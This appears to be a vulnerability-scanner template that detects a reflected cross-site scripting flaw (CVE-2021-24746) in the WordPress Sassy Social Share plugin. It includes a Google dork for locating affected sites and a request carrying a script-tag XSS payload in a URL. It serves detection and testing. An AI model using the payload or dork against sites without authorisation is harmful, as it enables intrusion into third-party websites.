id: CVE-2021-24746 info: name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting author: Supras severity: medium description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability. reference: - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa - https://nvd.nist.gov/vuln/detail/CVE-2021-24746 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24746 cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/sassy-social-share" tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/posts" - "{{BaseURL}}/{{slug}}/?a"><script>alert(document.domain)</script>" host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - '?a">' - type: word part: header words: - text/html - type: status status: - 200 extractors: - type: regex part: body name: slug internal: true group: 1 regex: - '"slug":"([_a-z-A-Z0-9]+)",' # Enhanced by cs 2022/09/14